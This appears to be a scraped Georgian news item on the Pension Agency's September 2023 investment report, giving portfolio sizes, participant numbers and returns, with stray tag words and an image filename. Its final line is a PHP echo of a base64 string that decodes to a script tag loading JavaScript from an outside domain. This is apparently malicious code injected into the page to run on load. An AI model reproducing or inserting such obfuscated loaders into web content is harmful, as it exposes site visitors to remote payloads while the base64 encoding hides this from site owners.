celsiusi
ავერსი საქკაბელი
საპენსიო სააგენტო სექტემბრის ყოველთვიურ საინვესტიციო ანგარიშს თითოეული საინვესტიციო პორტფელის მიხედვით აქვეყნებს.
 
როგორც ცნობილია, „დაგროვებითი პენსიის შესახებ“ კანონის შესაბამისად, დაგროვილი საპენსიო აქტივები განთავსებულია განსხვავებულ რისკიანობისა და მოსალოდნელი შემოსავლიანობის მქონე საინვესტიციო პორტფელში: კონსერვატიული, დაბალანსებული და დინამიური. თითოეულ პორტფელზე დეტალური ინფორმაცია, შეგიძლიათ იხილოთ პროაქტიულად და ყოველდღიურად საპენსიო სააგენტოს ვებგვერდზე. დინამიური ფონდის მოცულობა შეადგენს 2,873 მლნ ლარს, მასში ჩართულია 908,800 მონაწლე, სექტემბრის თვის ამონაგებმა 0.20% შეადგინა დაბალანსებული პორტფელის მოცულობა შეადგენს 600 მლნ ლარს, მასში ჩართულია 201,900 მონაწილე, სექტემბერში ამონაგებმა 0.26% შეადგინა კონსერვატიული პორტფელის მოცულობა 461 მლნ ლარია, მასში 167,900 ადამიანია ჩართული, სექტემბერში ამონაგებმა კი 0.43% შეადგინა.
 380140014 138822249293347 6717777845698696350 n
  
 
საპენსიო სააგენტოს 2023 წლის 30 სექტემბრის სტატისტიკა 2023 წლის 30 სექტემბრის მდგომარეობით მთლიანი საპენსიო აქტივების ღირებულება 3.93 მილიარდი ლარია. წმინდა ამონაგები, კი 693 მილიონ ლარს შეადგენს. საპენსიო სქემაში გაწევრიანებულ მონაწილეთა რაოდენობა 1 მილიონ 448 ათასი ადამიანია. დღეისათვის, დაგროვებითი პენსიით ისარგებლა სხვადასხვა კატეგორიის 5,133 პირმა მათზე გაცემული თანხა კი 15.8 მილიონ ლარს შეადგენს. 
 
 
381
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");